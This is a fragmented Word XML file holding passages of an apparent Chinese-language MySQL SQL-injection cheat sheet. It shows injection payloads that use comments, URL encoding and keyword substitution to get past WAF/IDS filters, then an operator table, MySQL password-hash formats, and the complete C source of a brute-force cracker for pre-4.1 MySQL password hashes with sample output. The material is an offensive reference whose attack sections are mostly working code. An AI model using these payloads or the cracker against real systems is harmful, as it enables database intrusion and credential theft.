            <w:tcW w:w="256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56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256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例子：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1 FROM dual WHERE 1=1 AND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</w:rPr>
        <w:t>-+-+-+-+~~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((1))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Courier" w:hAnsi="Courier" w:cs="Courier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注释：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对偶表是一种可用于测试的虚拟表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leftChars="0" w:right="30" w:righ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混淆注释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注释可以用来分解查询来欺骗WAF/ id并避免检测。通过使用#或——后面跟着一个换行符，我们可以将查询分割成不同的行。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例子：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630" w:leftChars="300" w:right="30" w:rightChars="0" w:firstLine="0" w:firstLineChars="0"/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1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体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#</w:t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AND 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体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--</w:t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UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体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# I am a comment!</w:t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SELECT@tmp:=table_name x FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体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--</w:t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`information_schema`.tables LIMIT 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="CC0000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier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URL编码的注入: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/>
        <w:rPr>
          <w:rFonts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1'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%23%0A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AND 0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--%0A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UNION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%23 I am a comment!%0A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SELECT@tmp:=table_name x FROM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--%0A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`information_schema`.tables LIMIT 1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%23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某些函数也可以用注释和空格混淆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例如：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4620" w:firstLineChars="220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VERSION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/**/%A0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/*comment*/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4620" w:firstLineChars="2200"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courie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leftChars="0" w:right="30" w:rightChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier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urier" w:hAnsi="Courier" w:cs="Courier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有时，对注入进行编码对于WAF/IDS规避是有用的。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8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6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0" w:lineRule="atLeast"/>
              <w:ind w:right="0" w:rightChars="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts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URL编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="622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%74able_%6eame FROM information_schema.tables;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双URL编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="622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%2574able_%256eame FROM information_schema.tables;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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>代码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编码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="622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%u0074able_%u6eame FROM information_schema.tables;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无效十六进制编码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(ASP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6221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%tab%le_%na%me FROM information_schema.tables;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leftChars="0" w:right="30" w:righ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避免关键字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如果IDS/WAF阻塞了某些关键字，那么还有其他方法可以绕过它而不使用编码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540" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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information_schema.tables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-330" w:leftChars="0" w:right="30" w:rightChars="0" w:firstLine="540" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="50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0"/>
        <w:gridCol w:w="4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共享空间</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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color w:val="auto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information_schema . tables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</w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="99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倒引号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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color w:val="auto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`information_schema`.`tables`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特定码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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color w:val="auto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/*!information_schema.tables*/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eastAsia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备用名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="403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color w:val="auto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information_schema.partitions </w:t>
            </w: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information_schema.statistics </w:t>
            </w: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information_schema.key_column_usage </w:t>
            </w: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ourier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier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information_schema.table_constraints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注释：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备用名称可能取决于表中存在的主键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二十一、操作符</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="845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9"/>
        <w:gridCol w:w="6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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_and"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AND , &amp;&amp;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逻辑与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"http://dev.mysql.com/doc/refman/5.6/en/assignment-operators.html" \l "operator_assign-equal"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=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赋值(作为SET语句的一部分，或UPDATE语句中的SET子句的一部分)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"http://dev.mysql.com/doc/refman/5.6/en/assignment-operators.html" \l "operator_assign-value"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:=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"operator_between"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BETWEEN ... AND ...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检查值是否在值的范围内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"http://dev.mysql.com/doc/refman/5.6/en/cast-functions.html" \l "operator_binary"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BINARY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将字符串转换为二进制字符串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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-and"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&amp;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位和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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-invert"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~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位反转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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-or"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|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按位或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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_bitwise-xor"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^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按位异或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"http://dev.mysql.com/doc/refman/5.6/en/control-flow-functions.html" \l "operator_case"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CASE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事例运算符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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_div"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DIV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整数除法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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_divide"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0" w:lineRule="atLeast"/>
              <w:ind w:left="-360" w:leftChars="0" w:right="0" w:rightChars="0" w:firstLine="420" w:firstLineChars="200"/>
              <w:jc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除法运算符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"operator_equal-to"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&lt;=&gt;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NULL-safe equal to operator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"operator_equal"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=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相等操作符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"operator_greater-than-or-equal"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&gt;=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0" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0" w:hanging="360"/>
              <w:jc w:val="both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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">              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大于或等于运算符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"operator_greater-than"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&gt;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大于运算符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"operator_is-not-null"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IS NOT NULL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非空值检验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"operator_is-not"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IS NOT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根据布尔值测试值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"operator_is-null"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IS NULL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NULL值测试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"operator_is"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IS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根据布尔值测试值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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_left-shift"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&lt;&lt;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向左移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"operator_less-than-or-equal"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&lt;=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小于或等于操作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"operator_less-than"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&lt;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小于操作符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"http://dev.mysql.com/doc/refman/5.6/en/string-comparison-functions.html" \l "operator_like"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LIKE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简单的模式匹配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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_minus"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0" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0" w:hanging="360"/>
              <w:jc w:val="both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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">                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负运算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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_mod"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% or MOD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0" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0" w:hanging="360"/>
              <w:jc w:val="both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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">               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模运算符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"operator_not-between"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NOT BETWEEN ... AND ...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检查值是否不在值的范围内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"http://dev.mysql.com/doc/refman/5.6/en/comparison-operators.html" \l "operator_not-equal"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!= , &lt;&gt;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0" w:lineRule="atLeast"/>
              <w:ind w:left="0" w:right="0" w:hanging="360"/>
              <w:jc w:val="both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lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">              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不等于操作符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"http://dev.mysql.com/doc/refman/5.6/en/string-comparison-functions.html" \l "operator_not-like"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NOT LIKE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否定简单模式匹配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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_not-regexp"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NOT REGEXP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否定的REGEXP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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_not"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NOT , !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否定值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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_or"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|| , OR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逻辑或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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_plus"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+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加法运算符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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_regexp"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REGEXP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使用正则表达式进行模式匹配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"http://dev.mysql.com/doc/refman/5.6/en/bit-functions.html" \l "operator_right-shift"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&gt;&gt;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右移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"http://dev.mysql.com/doc/refman/5.6/en/regexp.html" \l "operator_regexp"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RLIKE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REGEXP的同义词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"http://dev.mysql.com/doc/refman/5.6/en/string-functions.html" \l "operator_sounds-like"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SOUNDS LIKE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作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比较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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_times"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*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Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsiaTheme="minorEastAsia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乘法运算符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"http://dev.mysql.com/doc/refman/5.6/en/arithmetic-functions.html" \l "operator_unary-minus"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改变参数的符号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"http://dev.mysql.com/doc/refman/5.6/en/logical-operators.html" \l "operator_xor" \t "https://websec.ca/kb/_blank" </w:instrTex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</w:rPr>
              <w:t>XOR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97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Calibri" w:hAnsi="Calibri" w:cs="Calibri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逻辑异或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二十二、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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常量</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="30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current_user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null, \N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true, false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二十三、哈希密码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在MySQL 4.1之前，password()函数计算的密码散列长度为16字节。这样的哈希是这样的:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="7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9"/>
        <w:gridCol w:w="4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1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PASSWORD('mypass')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="484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6f8c114b58f2ce9e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Chars="0" w:right="30" w:rightChars="0"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从MySQL 4.1开始，PASSWORD()函数被修改为一个更长的41字节哈希值:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="7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9"/>
        <w:gridCol w:w="4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89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PASSWORD('mypass')</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4875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" w:hAnsi="Courier" w:cs="Courier"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Courier" w:hAnsi="Courier" w:eastAsia="宋体" w:cs="Courier"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4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二十四、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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密码破解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凯恩和亚伯以及开膛手约翰都能破解MySQL 3.x-6。x的密码。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这里可以找到一个用于JTR的Metasploit模块。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/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MySQL &lt; 4.1密码破解器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这个工具是一个高速蛮力密码破解MySQL哈希密码。在普通PC上，它可以在数小时内破解包含任何可打印ASCII字符的8个字符的密码。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这个程序是公共领域。分享和享受。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Example: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$ gcc -O2 -fomit-frame-pointer MySQLfast.c -o MySQLfast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$ MySQLfast 6294b50f67eda209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Hash: 6294b50f67eda209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Trying length 3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Trying length 4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Found pass: barf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The MySQL password hash function could be strengthened considerably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by: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- making two passes over the password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- using a bitwise rotate instead of a left shift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 - causing more arithmetic overflows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*/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#include &lt;stdio.h&gt;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typedef unsigned long u32;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/* Allowable characters in password; 33-126 is printable ascii */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#define MIN_CHAR 33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#define MAX_CHAR 126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/* Maximum length of password */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#define MAX_LEN 12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#define MASK 0x7fffffffL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int crack0(int stop, u32 targ1, u32 targ2, int *pass_ary)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int i, c;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u32 d, e, sum, step, diff, div, xor1, xor2, state1, state2;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u32 newstate1, newstate2, newstate3;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u32 state1_ary[MAX_LEN-2], state2_ary[MAX_LEN-2];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u32 xor_ary[MAX_LEN-3], step_ary[MAX_LEN-3];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i = -1;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sum = 7;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state1_ary[0] = 1345345333L;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state2_ary[0] = 0x12345671L;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while (1)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while (i &lt; stop)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i++;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pass_ary[i] = MIN_CHAR;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step_ary[i] = (state1_ary[i] &amp; 0x3f) + sum;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xor_ary[i] = step_ary[i]*MIN_CHAR + (state1_ary[i] &lt;&lt; 8);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sum += MIN_CHAR;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state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];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state2_ary[i+1] = state2_ary[i]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  + ((state2_ary[i] &lt;&lt; 8) ^ state1_ary[i+1]);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state1 = state1_ary[i+1];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state2 = state2_ary[i+1];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step = (state1 &amp; 0x3f) + sum;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xor1 = step*MIN_CHAR + (state1 &lt;&lt; 8);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xor2 = (state2 &lt;&lt; 8) ^ state1;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for (c = MIN_CHAR; c &lt;= MAX_CHAR; c++, xor1 += step)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newstate2 = state2 + (xor1 ^ xor2);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newstate1 = state1 ^ xor1;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newstate3 = (targ2 - newstate2) ^ (newstate2 &lt;&lt; 8);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div = (newstate1 &amp; 0x3f) + sum + c;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diff = ((newstate3 ^ newstate1) - (newstate1 &lt;&lt; 8)) &amp; MASK;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if (diff % div != 0) continue;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d = diff / div;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if (d &lt; MIN_CHAR || d &gt; MAX_CHAR) continue;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div = (newstate3 &amp; 0x3f) + sum + c + d;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diff = ((targ1 ^ newstate3) - (newstate3 &lt;&lt; 8)) &amp; MASK;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if (diff % div != 0) continue;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e = diff / div;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if (e &lt; MIN_CHAR || e &gt; MAX_CHAR) continue;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pass_ary[i+1] = c;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pass_ary[i+2] = d;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pass_ary[i+3] = e;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return 1;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while (i &gt;= 0 &amp;&amp; pass_ary[i] &gt;= MAX_CHAR)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sum -= MAX_CHAR;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i--;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if (i &lt; 0) break;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pass_ary[i]++;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xor_ary[i] += step_ary[i];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sum++;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state1_ary[i+1] = state1_ary[i] ^ xor_ary[i];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state2_ary[i+1] = state2_ary[i]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+ ((state2_ary[i] &lt;&lt; 8) ^ state1_ary[i+1]);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return 0;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void crack(char *hash)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int i, len;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u32 targ1, targ2, targ3;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int pass[MAX_LEN];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if ( sscanf(hash, "%8lx%lx", &amp;targ1, &amp;targ2) != 2 )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printf("Invalid password hash: %s\n", hash);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return;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printf("Hash: %08lx%08lx\n", targ1, targ2);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targ3 = targ2 - targ1;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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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targ3 = targ2 - ((targ3 &lt;&lt; 8) ^ targ1);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for (len = 3; len &lt;= MAX_LEN; len++)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printf("Trying length %d\n", len);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if ( crack0(len-4, targ1, targ3, pass) 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printf("Found pass: ");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for (i = 0; i &lt; len; i++)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  putchar(pass[i]);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putchar('\n');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  break;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if (len &gt; MAX_LEN)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printf("Pass not found\n");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int main(int argc, char *argv[])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int i;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if (argc &lt;= 1)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printf("usage: %s hash\n", argv[0]);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for (i = 1; i &lt; argc; i++)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  crack(argv[i]);</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="4"/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 xml:space="preserve">  return 0;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right="30" w:rightChars="0" w:firstLine="420" w:firstLineChars="200"/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A3D59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="844A3D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3240EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F3240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6DD8F1E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="96DD8F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C1B47D1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DC1B47D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F3552029"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F35520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CEC28D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CEC28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E327DA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E327D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8ADBD51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68ADBD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C785FB6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6C785FB6"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1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E0DB4"/>
    <w:rsid w:val="0BC223EE"/>
    <w:rsid w:val="249C58A7"/>
    <w:rsid w:val="26F853B0"/>
    <w:rsid w:val="297D7FC2"/>
    <w:rsid w:val="332F37C6"/>
    <w:rsid w:val="35652D51"/>
    <w:rsid w:val="391D26FE"/>
    <w:rsid w:val="4029734F"/>
    <w:rsid w:val="45333425"/>
    <w:rsid w:val="572E0DB4"/>
    <w:rsid w:val="638E0E63"/>
    <w:rsid w:val="66505D5A"/>
    <w:rsid w:val="74F301C3"/>
    <w:rsid w:val="7AEC730B"/>
    <w:rsid w:val="7B3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2019-07-02T04:44:00Z</dcterms:created>
  <dc:creator>Xiner</dc:creator>
  <cp:lastModifiedBy>Xiner</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-02T10:19:25Z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